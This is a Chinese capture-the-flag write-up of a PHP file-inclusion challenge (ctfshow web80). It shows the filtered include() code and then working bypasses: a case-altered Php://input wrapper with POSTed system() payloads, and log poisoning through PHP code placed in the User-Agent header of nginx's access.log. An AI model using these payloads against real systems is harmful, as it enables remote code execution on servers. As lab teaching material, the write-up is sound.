[ctfshow web入门] web80

信息收集

过滤了phpdata

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据


日志绕过

php 复制代码
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
m0_738120721 分钟前
渗透测试——靶机DC-4详细渗透教程
运维·网络·安全·web安全·php
醉挽清风7833 分钟前
Vue+Djiango基础用法
前端·javascript·vue.js
dreams_dream3 分钟前
vue2动态更改css属性方法大全
前端·css
阿基米东5 分钟前
Caddy:把 HTTPS 变成默认选项的现代 Web 服务器
服务器·前端·https
洞窝技术8 分钟前
从原理到落地:大屏适配适配 + 高并发弹幕的企业级技术手册
前端·css
IT_陈寒12 分钟前
JavaScript性能优化:5个V8引擎隐藏技巧让你的代码提速50%
前端·人工智能·后端
菠菜盼娣20 分钟前
第三方插件 unplugin-icons
前端
敲代码的彭于晏25 分钟前
在迁移中学习 React 18:一份来自 React 17 的升级问题清单
前端·react.js
Neolnfra27 分钟前
文件包含漏洞终极指南
开发语言·安全·web安全·网络安全·系统安全·php·可信计算技术
顾安r31 分钟前
12.17 脚本工具 自动化全局跳转
linux·前端·css·golang·html